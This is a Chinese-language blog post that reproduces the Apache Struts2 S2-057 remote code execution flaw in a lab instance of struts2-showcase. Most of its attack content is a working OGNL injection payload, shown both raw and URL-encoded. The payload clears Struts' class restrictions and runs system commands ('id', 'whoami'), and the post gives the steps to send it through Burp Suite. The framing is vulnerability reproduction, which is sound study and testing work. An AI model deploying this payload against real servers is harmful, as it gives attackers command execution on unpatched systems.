大家好,又见面了,我是你们的朋友全栈君。
S2-057漏洞产生于网站配置xml的时候,有一个namespace的值,该值并没有做详细的安全过滤导致可以写入到xml上,尤其url标签值也没有做通配符的过滤,导致可以执行远程代码以及系统命令到服务器系统中去 。
启动环境后,在Win10上访问http://IP:port/struts2-showcase
1.构建Payload:
访问:
http://your-ip:8080/struts2-showcase/$%7B233*233%7D/actionChain1.action可以看到233 * 233的结果已在Location标头中返回。
将以下payload进行URL编码:
${ (#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#ct=#request[‘struts.valueStack’].context).(#cr=#ct[‘com.opensymphony.xwork2.ActionContext.container’]).(#ou=#cr.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ou.getExcludedPackageNames().clear()).(#ou.getExcludedClasses().clear()).(#ct.setMemberAccess(#dm)).(#a=@java.lang.Runtime@getRuntime().exec(‘id’)).(@org.apache.commons.io.IOUtils@toString(#a.getInputStream()))}
URL编码后
$%7B%0A%28%23dm%3D@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29.%28%23ct%3D%23request%5B%27struts.valueStack%27%5D.context%29.%28%23cr%3D%23ct%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ou%3D%23cr.getInstance%28@com.opensymphony.xwork2.ognl.OgnlUtil@class%29%29.%28%23ou.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ou.getExcludedClasses%28%29.clear%28%29%29.%28%23ct.setMemberAccess%28%23dm%29%29.%28%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27whoami%27%29%29.%28@org.apache.commons.io.IOUtils@toString%28%23a.getInputStream%28%29%29%29%7D
并在burpsuit的GET /struts2-showcase/$%7B233*233%7D/actionChain1.action HTTP/1.1中将URL编码的插入到/$%7B233*233%7D/ ,将$%7B233*233%7D去掉。
发布者:全栈程序员-站长,转载请注明出处:https://javaforall.net/158495.html原文链接:https://javaforall.net
